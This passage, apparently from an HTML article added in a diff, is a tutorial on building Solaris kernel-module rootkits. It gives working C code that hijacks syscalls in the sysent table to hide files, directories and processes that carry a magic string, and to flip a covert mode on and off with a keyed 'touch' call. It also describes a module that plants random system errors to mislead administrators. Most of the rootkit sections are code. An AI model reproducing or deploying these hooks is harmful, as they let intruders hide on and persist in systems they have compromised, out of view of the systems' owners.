+<br><tt>&nbsp;&nbsp;&nbsp; oldcreat64 = (void *) sysent[SYS_creat64].sy_callc;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; oldread = (void *) sysent[SYS_read].sy_callc;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; sysent[SYS_execve].sy_callc = (void *) newexecve;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; sysent[SYS_open64].sy_callc = (void *) newopen64;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; sysent[SYS_creat64].sy_callc = (void *) newcreat64;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; sysent[SYS_read].sy_callc = (void *) newread;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; return i;</tt>
+<br><tt>}</tt></blockquote>
+This is an _init() call described in 3.3, after initializing the module
+we copy the pointers of the old syscalls that are stored in the member
+<tt>.sy_callc
+</tt>to
+some pointers we defined at the top of our module. This is done exactly
+as with all Linux kernel modules.
+<br>After we have saved the old pointers we copy pointers of our new syscalls
+(in this case: <tt>int newcreat64(const char *path,mode_t mode</tt>) to
+the pointers in the <tt>sysent[] </tt>array<tt>.</tt></blockquote>
+<font size=+1>4.2&nbsp;&nbsp; Generating errno messages</font>
+<blockquote>I have seen some loadable kernel modules that generate error
+message a way that wont work under Solaris, the so called error numbers
+listed in <tt>/usr/include/sys/errno.h</tt> should not be returned by function
+using the following code:
+<blockquote><tt>return -ENOENT;</tt></blockquote>
+Eventhough this code will work since a negative value is returned it does
+not tell Solaris what kind of error appeared, instead the following code
+using the syscall <tt>set_errno()</tt> is the correct solution.
+<blockquote><tt>set_errno(ENOENT);</tt>
+<br><tt>return -1;</tt></blockquote>
+You really should tell your operating system what is going wrong even if
+you produce a fake error message.&nbsp;</blockquote>
+<font size=+1>4.3&nbsp;&nbsp; Allocating kernel memory</font>
+<blockquote>When working inside the kernel, you cannot allocate memory
+using the function <tt>alloc()</tt> or <tt>malloc()</tt> due to the fact
+that the kernel memory is strictly seperated from the user memory. Solaris
+provides to function for allocating and freeing kernel memory.
+<blockquote><tt>name = (char *) kmem_alloc(size, KM_SLEEP);</tt></blockquote>
+<tt>kmem_alloc()</tt> allocates <tt>size</tt> bytes of kernel memory and
+returns a pointer to the allocated memory. The allocated memory is at least
+double-word aligned, so it can hold any C data structure. No greater alignment
+can be assumed. The second parameter determines whether the caller can
+sleep for memory. <tt>KM_SLEEP</tt> allocations may sleep but are guaranteed
+to succeed. <tt>KM_NOSLEEP</tt> allocations are guaranteed not to sleep
+but&nbsp; may fail&nbsp; (return <tt>NULL</tt>) if no memory is currently
+available. <tt>KM_NOSLEEP</tt> using <tt>kmem_alloc()</tt> should only be
+used from interrupt context, it should not be called otherwise.  
+The initial contents of memory allocated using <tt>kmem_alloc()
+</tt>are
+random garbage.
+<br>The allocated kernel memory has to be freed using the function <tt>kmem_free(size)</tt>,
+while size is the size of the allocated memory. Be careful, if you are
+freeing more memory as you allocated major problems will occur, since unwanted
+parts of the kernel get freed.
+<p>As I started coding this module I didn't care about the transfer between
+user and kernel memory. On Solaris 2.7 (x86) a <tt>memcpy()</tt> successfully
+solved this task and there was no need for special commands. But on Solaris
+(Sparc) this lousy way of transfering data didn't work at all. For a proper
+transfer use the functions<tt> copyin() </tt>and<tt> copyout()</tt> that
+provide a way to transfer data from kernel memory (device module memory)
+and user memory.&nbsp;
+<br>If you want to copy null-terminated strings from userspace to kernel
+memory use the command <tt>copyinstr()</tt>, that has the following
+prototype
+<tt>copyinstr(char *src, char *dst, size_t length, size_t size)</tt>. <tt>length</tt>
+describes how many bytes to read while <tt>size</tt> is the value of actually
+read bytes.
+<br>A complete description of these functions can be found in the following
+Solaris man pages: kmem_alloc(9F), copyin(9F) and copyout(9F). Here is
+a small example:
+<blockquote><tt>&nbsp;&nbsp;&nbsp; name = (char *) kmem_alloc(256, KM_SLEEP);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; copyin(filename, name, 256);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; if (!strcmp(name, (char *) oldcmd)) {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; copyout((char *) newcmd,
+(char *) filename, strlen(newcmd) + 1);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"sitf:
+executing %s instead of %s", newcmd, name);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; }</tt></blockquote>
+If you don't need to allocate kernel memory, e.g. if you are just comparing
+some values, you might use also the <tt>memcpy()</tt> function, but be
+adviced memcpy doesnot work on Ultra Sparc. Use <tt>copyinstr()</tt> in
+order to copy null terminated strings to kernel memory where you can compare
+them. copyinstr(char *src, char *dst, size_t n, size_t n)</blockquote>
+<font size=+1>-->&nbsp;&nbsp; Module: anm.c</font>
+<blockquote>As an example I included the module anm.c (Administrator's
+NightMare) from the package
+<a href="slkm-1.0.tar.gz">slkm-1.0.tar.gz</a>,
+this is not a very intelligent module - instead of backdooring the system,
+this module randomly generates system errors on the following syscalls:
+<tt>execve(),open64()</tt>
+and <tt>read()</tt>. The period of the random errors can be set with these
+three variables:
+<blockquote><tt>int open_rate = 200;</tt>
+<br><tt>int read_rate = 8000;</tt>
+<br><tt>int exec_rate = 400;</tt></blockquote>
+The values have been tested on a client station. The system behaves quite
+normal, but from time to time a small error appears that won't interest
+an admin. The system will just look like one of those badly configured
+cheap Solaris (but actually it isn't).&nbsp;
+<br>To activate or deactivate the errors I developed a switching mechanism,
+I will explain the technique later in 5.3, first of all here is the usage
+from the command line when the module is loaded.
+<blockquote><tt>touch my_stupid_key</tt></blockquote>
+This command enables or disables the functions of the anm.c module, if
+you used the correct key that has been defined inside the module you will
+get an error message instead of a touched "my_stupid_key" file.&nbsp;</blockquote>
+
+<hr SIZE=1 NOSHADE WIDTH="100%">
+<br>&nbsp;
+<p><font size=+1>5&nbsp;&nbsp; Implementing the common backdoors</font>
+<blockquote>Most ideas of the backdoors I implemented have been taken from
+plaguez's itf.c module and the article written by pragmatic (see 7 References),
+some of them could be implemented as they are, other routines had to be
+rewritten and some had to be coded from scratch.
+<br>If you take a look at the modules sitf0.1.c and sitf0.2.c from the
+package <a href="slkm-1.0.tar.gz">slkm-1.0.tar.gz</a>
+you will find backdoors that are not described in this article, these function
+could be ported without any problem from Linux or FreeBSD modules. I think
+they have been documented in several other articles already.</blockquote>
+<font size=+1>5.1&nbsp;&nbsp; Hiding files from getdents64()</font>
+<blockquote>If you trace through commands as <tt>ls</tt> or <tt>du</tt>
+you will find out that Solaris systems use the <tt>getdents64()</tt> syscall
+to retrieve information about the content of a directory therefore I took
+a closer look at plaguez's implementation of a faked <tt>getdents() </tt>syscall
+hiding files from being listed.
+<br>While playing with his code I discovered that getting the entries from
+<tt>getdents64()</tt>
+is easier as on Linux, it is not necessary to care about user- and kernelsparce
+(well, I know this isn't a proper approach, but who cares), I simply modified
+his code to work with <tt>getdents64()</tt> and the <tt>dirent64</tt> entries
+used <tt>copyin()</tt> and <tt>copyout()</tt> (see 4.3 Allocation kernel
+memory). The
+<tt>getdents64()</tt> syscall and its structs are documented
+inside the Solaris man pages, take a look at the following pages: getdent(2),
+dirent(4), but keep in mind that you have to use the 64bit variants, just
+read the header file
+<tt>/usr/include/sys/dirent.h</tt> and you will find
+what you are looking for. A final version of a faked <tt>getdents64() </tt>syscall
+looks like that:
+<blockquote><tt>#define MAGIC&nbsp;&nbsp; "CHT.THC"</tt>
+<br><tt>char magic[] = MAGIC;</tt>
+<p>[...]
+<p><tt>int newgetdents64(int fildes, struct dirent64 *buf, size_t nbyte)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int ret, oldret, i, reclen;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; struct dirent64 *buf2, *buf3;&nbsp;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; oldret = (*oldgetdents64) (fildes, buf, nbyte);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; ret = oldret;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if (ret > 0) {&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; buf2 = (struct dirent64
+*) kmem_alloc(ret, KM_SLEEP);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; copyin((char *) buf,
+(char *) buf2, ret);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; buf3 = buf2;&nbsp;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; i = ret;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; while (i > 0) {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+reclen = buf3->d_reclen;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+i -= reclen;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+if (strstr((char *) &amp;(buf3->d_name), (char *) &amp;magic) != NULL)
+{</tt>
+<br><tt>#ifdef DEBUG&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+cmn_err(CE_NOTE,"sitf: hiding file (%s)", buf3->d_name);</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+if (i != 0)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+memmove(buf3, (char *) buf3 + buf3->d_reclen, i);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+buf3->d_off = 1024;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+ret -= reclen;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+}&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/*&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+* most people implement this little check into their modules,</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+* don't ask me, if some of the solaris fs driver modules really</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+* generate a d_reclen=0.</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+* correction: this code is needed for solaris sparc at least,</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+* otherwise you`ll find yourself back in a world of crashes.</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+*/</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+if (buf3->d_reclen &lt; 1) {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+ret -= i;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+i = 0;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+}&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+if (i != 0)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+buf3 = (struct dirent64 *) ((char *) buf3 + buf3->d_reclen);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; copyout((char *) buf2,
+(char *) buf, ret);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; kmem_free(buf2, oldret);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; }</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; return ret;</tt>
+<br><tt>}</tt></blockquote>
+Understanding this code is not that easy, since it works with the weird
+dirent structure, but the <tt>dirent</tt> struct is also present in Linux
+and can be understand reading the man pages and the specific headers, I
+won't go into more details.&nbsp;
+<br>There is still a minor problem with this piece of code, when you include
+the magic string more than once in to your filename the module won't act
+correctly, it looks like the <tt>strstr()</tt> function causes problems
+while running inside the kernel. I plan to fix this bug in version 2.0
+of the article / module, until then include the magic string only once
+in your filenames.</blockquote>
+<font size=+1>5.2&nbsp;&nbsp; Hiding directories and file content</font>
+<blockquote>This idea has been taken from pragamatic's Linux kernel module
+article. If files are hidden from being listed as described above they still
+can be accessed by everybody and directories can be entered by everybody
+too. I used a switch (see 5.3 Generating a remote switch) to toggle these
+features On and Off. So if I don't want anybody to access the content of
+my hidden files or anybody to enter my hidden directories, I would turn
+the switch On.&nbsp;
+<br>The syscall open64() is used to open files for reading and writing
+under Solaris (not inside the /proc), if the filename of the file to be
+opened contains the magic word and the security flag is set, the faked
+syscall will return the error message: "No such file or directory".&nbsp;
+<blockquote><tt>#define MAGIC&nbsp;&nbsp; "CHT.THC"&nbsp;</tt>
+<br><tt>char magic[] = MAGIC;</tt>
+<br><tt>int security = FALSE;</tt>
+<p>[...]
+<p><tt>int newopen64(const char *path, int oflag, mode_t mode)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int ret;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int len;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; char namebuf[1028];</tt><tt></tt>
+<p><tt>&nbsp;&nbsp;&nbsp; ret = oldopen64(path, oflag, mode);</tt><tt></tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if (ret >= 0) {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; copyinstr(path, namebuf,
+1028, (size_t *) &amp; len);</tt><tt></tt>
+<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (security &amp;&amp;
+strstr(namebuf, (char *) &amp;magic) != NULL) {</tt>
+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+cmn_err(CE_NOTE, "sitf: hiding content of file (%s)", namebuf);</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+set_errno(ENOENT);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+return -1;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return ret;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; }</tt>
+<br><tt>}</tt>
+<br><tt></tt>&nbsp;</blockquote>
+The syscall chdir() is used to change the current directory, if someone
+tries to enter a directory containing the magic string and the security
+flag is set, the faked syscall will return the error message: "No such
+file or directory".
+<blockquote><tt>int newchdir(const char *path)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; char namebuf[1028];</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int len;</tt><tt></tt>
+<p><tt>&nbsp;&nbsp;&nbsp; copyinstr(path, namebuf, 1028, (size_t *) &amp;
+len);</tt><tt></tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if (security &amp;&amp; strstr(namebuf, (char
+*) &amp;magic) != NULL) {</tt>
+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE, "sitf:
+hiding directory (%s)", namebuf);</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; set_errno(ENOENT);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; } else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return oldchdir(path);</tt>
+<br><tt>}</tt>
+<br><tt></tt>&nbsp;</blockquote>
+These two functions combined with the faked <tt>getdents64()</tt>
+call protect all files and directories you want to hide including their
+content. But how can you easily switch between the total security and a
+work-environment where files are hidden but you can access and manipulate
+them, e.g. configuration files, read on.</blockquote>
+<font size=+1>5.3&nbsp;&nbsp; Generating a remote switch</font>
+<blockquote>While investigating some of the most used command line programs,
+I stumbeld over <tt>/usr/bin/touch</tt>, touch uses the syscall <tt>creat64()</tt>.
+I found this to be a good place to include a remote switch, for toggling
+features of a module On or Off, e.g. the security flag above in 5.2. Of
+cause this is not a real secure switch because an administrator could monitor
+you activities and will discover you suspicious touch calls.
+<br>First of all we need to define a key that will help us being the only
+person toggling our switch.
+<blockquote><tt>#define KEY "mykey"</tt>
+<br><tt>char key[] = KEY;</tt>
+<p>[...]
+<p><tt>int newcreat64(const char *path, mode_t mode)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; char namebuf[1028];</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int len;</tt><tt></tt>
+<p><tt>&nbsp;&nbsp;&nbsp; copyinstr(path, namebuf, 1028, (size_t *) &amp;
+len);</tt><tt></tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if (strstr(namebuf, (char *) &amp;key) != NULL)
+{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (security) {</tt>
+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+cmn_err(CE_NOTE, "sitf: disabeling security");</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+security = FALSE;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; } else {</tt>
+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+cmn_err(CE_NOTE, "sitf: enabeling security");</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+security = TRUE;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; set_errno(ENFILE);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; } else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return oldcreat64(path,
+mode);</tt>
+<br><tt>}</tt></blockquote>
+When the touch command is used the syscall <tt>creat64()</tt> will be called.
+Our faked syscall will check if the filename includes our key and then
+en- or disable the security flag. In order to tell us if this suceed it
+will return the error (<tt>ENFILE, </tt>The system file table is full).
+I hope this is a rather seldom error message.</blockquote>
+<font size=+1>5.4&nbsp;&nbsp; Hiding processes (proc file system approach)</font>
+<blockquote>Before I concentrated on the structured proc of Solaris, I
+developed a basic way to hide files from being listed. This code should
+only function as an example because it may consume a lot cpu power.
+<br>When a user executes <tt>ps</tt> or <tt>top</tt> these tools will read
+parts of the proc file systems and return their content. The file that
+halts information about the process caller and the executed file is <tt>psinfo</tt>
+found inf <tt>/proc/&lt;pid>/psinfo</tt>. The content of this file is described
+in <tt>/usr/include/sys/procfs.h</tt>.&nbsp;
+<blockquote><tt>typedef struct psinfo {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int&nbsp;&nbsp;&nbsp;&nbsp;
+pr_flag;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* process flags */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int&nbsp;&nbsp;&nbsp;&nbsp;
+pr_nlwp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* number of lwps in
+process */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pid_t&nbsp;&nbsp; pr_pid;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* unique process id */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pid_t&nbsp;&nbsp; pr_ppid;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* process id of parent */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pid_t&nbsp;&nbsp; pr_pgid;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* pid of process group leader */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pid_t&nbsp;&nbsp; pr_sid;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* session id */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; uid_t&nbsp;&nbsp; pr_uid;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* real user id */</tt>
+<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [...]
+<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char&nbsp;&nbsp;&nbsp;
+pr_psargs[PRARGSZ];&nbsp;&nbsp;&nbsp;&nbsp; /* initial characters of arg
+list */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int&nbsp;&nbsp;&nbsp;&nbsp;
+pr_wstat;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* if zombie, the wait()
+status */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int&nbsp;&nbsp;&nbsp;&nbsp;
+pr_argc;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* initial argument
+count */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; uintptr_t pr_argv;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* address of initial argument vector */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; uintptr_t pr_envp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* address of initial environment vector */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char&nbsp;&nbsp;&nbsp;
+pr_dmodel;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* data model of the process */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char&nbsp;&nbsp;&nbsp;
+pr_pad2[3];</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int&nbsp;&nbsp;&nbsp;&nbsp;
+pr_filler[7];&nbsp;&nbsp; /* reserved for future use */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; lwpsinfo_t pr_lwp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+/* information for representative lwp */</tt>
+<br><tt>} psinfo_t;</tt>
+<br>&nbsp;</blockquote>
+It's always the size of the<tt> psinfo_t</tt> struct. The member <tt>psargs</tt>
+includes the executed filename and the following arguments. Whenever a
+file named <tt>psinfo</tt> is opened a faked <tt>open()</tt> syscall will
+set a special flag, signaling that one of the next <tt>read()</tt> calls
+will read this file. Note that inside the /proc file system Solaris uses
+the <tt>open()</tt> syscall instead of the <tt>open64()</tt> syscall.&nbsp;
+<blockquote><tt>#define MAGIC "CHT.THC"</tt>
+<br><tt>char magic[] = MAGIC;</tt>
+<br><tt>char psinfo[] = "psinfo";</tt>
+<br><tt>int psfildes = FALSE;</tt>
+<p>[...]
+<p><tt>int newopen(const char *path, int oflag, mode_t mode)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int ret;&nbsp;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; ret = oldopen(path, oflag, mode);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; if (strstr(path, (char *) &amp;psinfo) != NULL)
+{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; psfildes = ret;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; } else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; psfildes = FALSE;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; return ret;</tt>
+<br><tt>}</tt></blockquote>
+A redirected <tt>read()</tt> function will look into the file if it has
+the size of a <tt>psinfo</tt> file and the <tt>open64()</tt> call has set
+the <tt>psfildes</tt> flag to the specific file descriptor. The<tt> read()</tt>
+syscall will then copy the content of the file to a <tt>psinfo_t</tt> struct
+and compare the executed file with the magic string. This is done by investigating
+<tt>psinfo_t->pr_psargs</tt>.
+If the magic string is found it will return an error and this proc entry
+won't be displayed in a process listing.&nbsp;
+<blockquote><tt>ssize_t</tt>
+<br><tt>newread(int fildes, void *buf, size_t nbyte)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; ssize_t ret;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; psinfo_t *info;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; ret = oldread(fildes, buf, nbyte);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; if (fildes > 0 &amp;&amp; fildes == psfildes
+&amp;&amp; nbyte == sizeof(psinfo_t)) {&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; info = (psinfo_t *)
+kmem_alloc(sizeof(psinfo_t), KM_SLEEP);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; copyin(buf, (void *)
+info, sizeof(psinfo_t));</tt>
+<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (strstr(info->pr_psargs,
+(char *) &amp;magic) != NULL) {</tt>
